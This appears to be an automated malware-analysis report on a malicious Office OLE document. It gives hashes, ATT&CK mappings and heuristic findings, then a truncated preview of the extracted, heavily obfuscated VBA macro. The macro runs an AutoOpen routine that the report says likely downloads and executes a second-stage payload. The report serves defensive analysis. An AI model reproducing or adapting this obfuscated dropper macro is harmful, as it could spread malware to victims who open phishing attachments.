Office (OLE) malware analysis — malicious · d9e7ecbacca15b8f

MALICIOUS

Office (OLE)

91.3 KB First seen: 2019-08-04

MD5: 7fdc7f62266513fdcf5a633d3c974a58 SHA-1: 16ae2513544ec9d09c1e2844ea76a4df03f9ab8f SHA-256: d9e7ecbacca15b8f33a68851725f90363df9e9d0bdac3bd282ef20eb0f238fe4

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains a high-severity OLE slack anomaly and a VBA macro with an AutoOpen subroutine, indicating malicious intent. The AutoOpen macro is obfuscated but likely attempts to download and execute a second-stage payload, as suggested by the concatenation of strings and calls to external functions. The presence of the 'macros.bas' file further supports the macro-based execution.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 93,541 bytes but its declared streams total only 36,411 bytes — 57,130 bytes (61%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24314 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	24314 bytes
SHA-256: `13c24dbe589911548446b93784a9c1b80c05a9d15a3f40efbf22e7d378ff3fda`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "XjfLisDjucS" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim LiHOou(1) LiHOou(0) = Mid(UafDKY + ZZDrUlncEhwjZXsjZtQ + koPjaj, 924, 20) + MidB(riQRJavX + NljuDAArwjJPhVDJvHjA + pOljGdW, 581, 498) + MidB(HUjafiJw + SjJcEsNcjktMNlPVNfpYIZ + jQdXBc, 2, 441) + Mid(GBlInzb + ISoPvXzCdKADDZwJjRMq + ckkErrzu, 232, 849) Dim YAAwfA(1) YAAwfA(0) = Mid(cqNBUinK + GOzNIWMGDQZfkWohNpJE + ZfzDou, 640, 259) + Left(BqKsij + ZYCLdfJzdIGzrjqNC + iMlQU, 413) + Right(DdQbfRTN + uhvEFnqiTInVPpqZM + vCZipWiq, 460) + Left(tIwNiGzt + snPIvWPbopKHlsizMrvnzcN + LjbTf, 11) kWOmnIjtktpw (KeyString(iAYfz + bCzQiO + 9 + 14 + 44 + ivwbic + stLlNFrL) + ZQJKmOz + ZmUZd + KeyString(PQwcLYP + mmIIVLl + 10 + 16 + 51 + piJUJhiw + AYTisipb) + dSEYjani + ElNhAZ + tDsPmEqKVsi + jlLhSYdjl + qUTzAhjPhjp + wMJmzkP + iaWKjaaLVBw + LVdUUMkFd + WuzOP + wjALUzf) Dim RvwAPf(2) RvwAPf(0) = MidB(NPsMWi + iUFDAzcGAtMwEcZOF + uqLkBz, 55, 398) + Mid(udqfa + USwuOmWSEokzQBbOsPwcz + oSTqfd, 621, 599) RvwAPf(1) = Left(JTfDpRU + kiosBaLDiYpqwEzq + ESWOS, 934) + MidB(Czbhi + zZSPZRcAwKKpFlWEjMRii + AAjwIQ, 154, 928) + MidB(jbzsbRC + mDFRiKiUhhvjlbUXotC + GlCXL, 94, 904) + Mid(arJvj + zmnPRjwpbzzidOkKsvnSQ + jJtCVs, 353, 477) Dim TtqDT(1) TtqDT(0) = MidB(SOYiTpd + SbhuzTSoNUbczENmzwLkc + IvujUT, 437, 237) + MidB(RwQAaMPF + pPUXirdlGrFJWjEsB + aGtmzl, 426, 690) Dim iXXdWt(2) iXXdWt(0) = MidB(KECczWzv + wVoTmNMfzMBHsojSRFHM + BEIYlJn, 77, 990) + Mid(lKlJR + kdJwKAVPcPnpIBJEHZpZz + TqdwJzPZ, 545, 167) iXXdWt(1) = Right(uHDDu + LIzkiAANJvELoOhQTPYQ + DjOwEVuO, 163) + MidB(TGzzImjP + RQfZYdrZnrTqaQinApDr + XFTKcs, 6, 972) + Left(PiWfWQX + vAPYcWBcjPOMBuKj + rVCpFCtw, 339) + Mid(UhfNHj + GrYRZWqiibGqmfNjXU + Kwzur, 489, 987) Dim tjbtbW(1) tjbtbW(0) = Mid(bsaRGLpk + cKMjvoNiviFKMMZE + NDAaMpJz, 655, 957) + Mid(SHmRNnBE + FNVlYHuzjXIPGMjfNwzSJ + YvzlDNjV, 959, 743) + Left(RBFiijZ + fEGERZAvuMvdjddJbt + BISiIN, 284) + Mid(fCsqshl + ZprsfnRiECPhiFvzus + IbPbrIIv, 840, 411) Dim PioWp(2) PioWp(0) = MidB(kFzlhLH + YIDKTWczmvkFHnHUfK + hDiKo, 621, 27) + Right(DaTJUfn + pWCRzwSjuDmTEWGlMoT + JjinVkHT, 547) + Left(RBQEDM + GuzkqEwZCfNWHSAKzv + KoOSDFC, 653) + Mid(SstKwo + liRwRznIlDBYEUvbQBsWUf + iUzWL, 123, 629) PioWp(1) = Mid(SNXPY + QizuOXiVNoPsLWwPTLP + rvQsaXMr, 732, 920) + MidB(jAoGlbWz + QsVwBSvlBmEHqvcBw + GHkVHIik, 870, 883) Dim TiJdf(2) TiJdf(0) = Mid(iJjVz + LnmmtovjRPLazatmiDw + TiqDkY, 121, 346) + MidB(zVJFbH + wsOTlDAYbLarUSKzo + KzpEA, 103, 998) TiJdf(1) = MidB(fBfwDD + mwjziGwEdomRJoNQijDzAS + YlQnRSM, 204, 793) + MidB(fqsAS + SAVNSWmVRjhVaYTRq + EzzlcB, 502, 736) End Sub Attribute VB_Name = "XpzIKKTGQiwv" Function dSEYjani() QGhAKfV = "d \/ // //" + "// / \ / /V:" + "O/C" + """" + "set ]}*~=027a 0" + "72a 07a2 0a72 207" ZiKwMnYW = "a 2a70 0a72 270a" + " 72a0 7a02 a" + "027 a207 02" Dim jqzRY(1) jqzRY(0) = MidB(tQiQXv + COZOzUwvOSWwXoiiun + CtiHaoHO, 488, 205) + Left(NQNZEMuC + GSWRGpNrPBWWwuHnzt + YlGaJd, 653) Dim iREfn(2) iREfn(0) = Right(YwBqjd + AmktXivcbWUGncpsK + YSjAZKiX, 742) + Right(YZbroTj + cEQTOiONtlJYLOWEJRE + liQfw, 777) + Right(AaNUB + rSPJtZYNMYbwcAEFijSMS + ZJwwuR, 3) + MidB(qBuvm + CSXNZjzpEviFZkVzOBPRH + PKCdT, 374, 409) iREfn(1) = Mid(tvMwqK + pVVinEKamzhmmMToTM + JHJMCYX, 172, 83) + MidB(clFhb + StjXQdsilWVJwEWiYCm + tIfYiji, 851, 298) + Left(qvmqfTXw + iPKXttKBvfqDdIwsGiGnCOz + wEfoRrL, 870) + Right(lnTvO + zsIihzFiIcbHTiwwQrZM + dSOFmj, 847) Dim ownPlI(2) ownPlI(0) = MidB(ZMTGzqu + ISnODpuwjAkJXCiZh + lZHZh, 940, 344) + Mid(MhAVPFjl + UmchdubKuIULGwjdiscX + ViOtSTzp, 690, 634) ownPlI(1) = Left(rifFm + msVuYjqHFErOquNRRaLi + XXWczZ, 126) + MidB(zvAkqJbq + fpJSwWQVRFaNtUAAJfzzY + HfWHpkWu, 931, 703) + MidB(aFhhl + YhGPpzHfEhrlbzPNbVESw + HtvcwMV, 761, 356) + MidB(PjKiv + OtcdcqwLAPUPKjNuDFVVwI + VoDtZO, 539, 649) Dim uZlXQ(1) uZlXQ(0) = MidB(YtbYSw ... (truncated)

SHA-256: 13c24dbe589911548446b93784a9c1b80c05a9d15a3f40efbf22e7d378ff3fda

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "XjfLisDjucS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim LiHOou(1)
LiHOou(0) = Mid(UafDKY + ZZDrUlncEhwjZXsjZtQ + koPjaj, 924, 20) + MidB(riQRJavX + NljuDAArwjJPhVDJvHjA + pOljGdW, 581, 498) + MidB(HUjafiJw + SjJcEsNcjktMNlPVNfpYIZ + jQdXBc, 2, 441) + Mid(GBlInzb + ISoPvXzCdKADDZwJjRMq + ckkErrzu, 232, 849)
   Dim YAAwfA(1)
YAAwfA(0) = Mid(cqNBUinK + GOzNIWMGDQZfkWohNpJE + ZfzDou, 640, 259) + Left(BqKsij + ZYCLdfJzdIGzrjqNC + iMlQU, 413) + Right(DdQbfRTN + uhvEFnqiTInVPpqZM + vCZipWiq, 460) + Left(tIwNiGzt + snPIvWPbopKHlsizMrvnzcN + LjbTf, 11)
kWOmnIjtktpw (KeyString(iAYfz + bCzQiO + 9 + 14 + 44 + ivwbic + stLlNFrL) + ZQJKmOz + ZmUZd + KeyString(PQwcLYP + mmIIVLl + 10 + 16 + 51 + piJUJhiw + AYTisipb) + dSEYjani + ElNhAZ + tDsPmEqKVsi + jlLhSYdjl + qUTzAhjPhjp + wMJmzkP + iaWKjaaLVBw + LVdUUMkFd + WuzOP + wjALUzf)
   Dim RvwAPf(2)
RvwAPf(0) = MidB(NPsMWi + iUFDAzcGAtMwEcZOF + uqLkBz, 55, 398) + Mid(udqfa + USwuOmWSEokzQBbOsPwcz + oSTqfd, 621, 599)
RvwAPf(1) = Left(JTfDpRU + kiosBaLDiYpqwEzq + ESWOS, 934) + MidB(Czbhi + zZSPZRcAwKKpFlWEjMRii + AAjwIQ, 154, 928) + MidB(jbzsbRC + mDFRiKiUhhvjlbUXotC + GlCXL, 94, 904) + Mid(arJvj + zmnPRjwpbzzidOkKsvnSQ + jJtCVs, 353, 477)
   Dim TtqDT(1)
TtqDT(0) = MidB(SOYiTpd + SbhuzTSoNUbczENmzwLkc + IvujUT, 437, 237) + MidB(RwQAaMPF + pPUXirdlGrFJWjEsB + aGtmzl, 426, 690)
   Dim iXXdWt(2)
iXXdWt(0) = MidB(KECczWzv + wVoTmNMfzMBHsojSRFHM + BEIYlJn, 77, 990) + Mid(lKlJR + kdJwKAVPcPnpIBJEHZpZz + TqdwJzPZ, 545, 167)
iXXdWt(1) = Right(uHDDu + LIzkiAANJvELoOhQTPYQ + DjOwEVuO, 163) + MidB(TGzzImjP + RQfZYdrZnrTqaQinApDr + XFTKcs, 6, 972) + Left(PiWfWQX + vAPYcWBcjPOMBuKj + rVCpFCtw, 339) + Mid(UhfNHj + GrYRZWqiibGqmfNjXU + Kwzur, 489, 987)
   Dim tjbtbW(1)
tjbtbW(0) = Mid(bsaRGLpk + cKMjvoNiviFKMMZE + NDAaMpJz, 655, 957) + Mid(SHmRNnBE + FNVlYHuzjXIPGMjfNwzSJ + YvzlDNjV, 959, 743) + Left(RBFiijZ + fEGERZAvuMvdjddJbt + BISiIN, 284) + Mid(fCsqshl + ZprsfnRiECPhiFvzus + IbPbrIIv, 840, 411)
   Dim PioWp(2)
PioWp(0) = MidB(kFzlhLH + YIDKTWczmvkFHnHUfK + hDiKo, 621, 27) + Right(DaTJUfn + pWCRzwSjuDmTEWGlMoT + JjinVkHT, 547) + Left(RBQEDM + GuzkqEwZCfNWHSAKzv + KoOSDFC, 653) + Mid(SstKwo + liRwRznIlDBYEUvbQBsWUf + iUzWL, 123, 629)
PioWp(1) = Mid(SNXPY + QizuOXiVNoPsLWwPTLP + rvQsaXMr, 732, 920) + MidB(jAoGlbWz + QsVwBSvlBmEHqvcBw + GHkVHIik, 870, 883)
   Dim TiJdf(2)
TiJdf(0) = Mid(iJjVz + LnmmtovjRPLazatmiDw + TiqDkY, 121, 346) + MidB(zVJFbH + wsOTlDAYbLarUSKzo + KzpEA, 103, 998)
TiJdf(1) = MidB(fBfwDD + mwjziGwEdomRJoNQijDzAS + YlQnRSM, 204, 793) + MidB(fqsAS + SAVNSWmVRjhVaYTRq + EzzlcB, 502, 736)
End Sub


Attribute VB_Name = "XpzIKKTGQiwv"
Function dSEYjani()
QGhAKfV = "d \/ //   //" + "// / \  / /V:" + "O/C" + """" + "set ]}*~=027a 0" + "72a 07a2 0a72 207"
ZiKwMnYW = "a 2a70 0a72 270a" + " 72a0 7a02 a" + "027 a207 02"
Dim jqzRY(1)
jqzRY(0) = MidB(tQiQXv + COZOzUwvOSWwXoiiun + CtiHaoHO, 488, 205) + Left(NQNZEMuC + GSWRGpNrPBWWwuHnzt + YlGaJd, 653)
   Dim iREfn(2)
iREfn(0) = Right(YwBqjd + AmktXivcbWUGncpsK + YSjAZKiX, 742) + Right(YZbroTj + cEQTOiONtlJYLOWEJRE + liQfw, 777) + Right(AaNUB + rSPJtZYNMYbwcAEFijSMS + ZJwwuR, 3) + MidB(qBuvm + CSXNZjzpEviFZkVzOBPRH + PKCdT, 374, 409)
iREfn(1) = Mid(tvMwqK + pVVinEKamzhmmMToTM + JHJMCYX, 172, 83) + MidB(clFhb + StjXQdsilWVJwEWiYCm + tIfYiji, 851, 298) + Left(qvmqfTXw + iPKXttKBvfqDdIwsGiGnCOz + wEfoRrL, 870) + Right(lnTvO + zsIihzFiIcbHTiwwQrZM + dSOFmj, 847)
   Dim ownPlI(2)
ownPlI(0) = MidB(ZMTGzqu + ISnODpuwjAkJXCiZh + lZHZh, 940, 344) + Mid(MhAVPFjl + UmchdubKuIULGwjdiscX + ViOtSTzp, 690, 634)
ownPlI(1) = Left(rifFm + msVuYjqHFErOquNRRaLi + XXWczZ, 126) + MidB(zvAkqJbq + fpJSwWQVRFaNtUAAJfzzY + HfWHpkWu, 931, 703) + MidB(aFhhl + YhGPpzHfEhrlbzPNbVESw + HtvcwMV, 761, 356) + MidB(PjKiv + OtcdcqwLAPUPKjNuDFVVwI + VoDtZO, 539, 649)
   Dim uZlXQ(1)
uZlXQ(0) = MidB(YtbYSw
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.